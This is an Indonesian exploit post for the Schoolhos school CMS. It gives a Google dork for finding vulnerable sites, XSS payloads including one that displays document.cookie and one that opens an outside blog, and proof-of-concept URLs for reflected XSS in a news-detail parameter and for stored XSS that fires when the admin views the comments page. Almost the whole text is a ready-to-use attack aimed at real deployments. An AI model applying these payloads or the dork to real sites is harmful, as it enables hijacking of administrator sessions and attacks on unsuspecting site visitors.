Google Dork: inurl:/?p=bukutamu intext:Schoolhos Free Open Source CMSCONTOH XSS :<script>alert('barrabravaz');</script><script>alert(document.cookie);</script><script>window.open("http://www.angonkimcil.blogspot.com/")</script>
POC : http://www.contoh.com/index.php?p=detberita&id=XSS
- Presistent XSS :POC : http://www.contoh.com/adminpanel/komentar.php <--- Apabila Si Admin melihat/masuk di halaman ini, script akan otomatis ter eksekusi.http://www.contoh.com/index.php?p=detberita&id=XSS <--- Jika user / urang yang sedang browsing di halaman yang anda kenai XSS, otomatis script XSS anda ter eksekusi :D
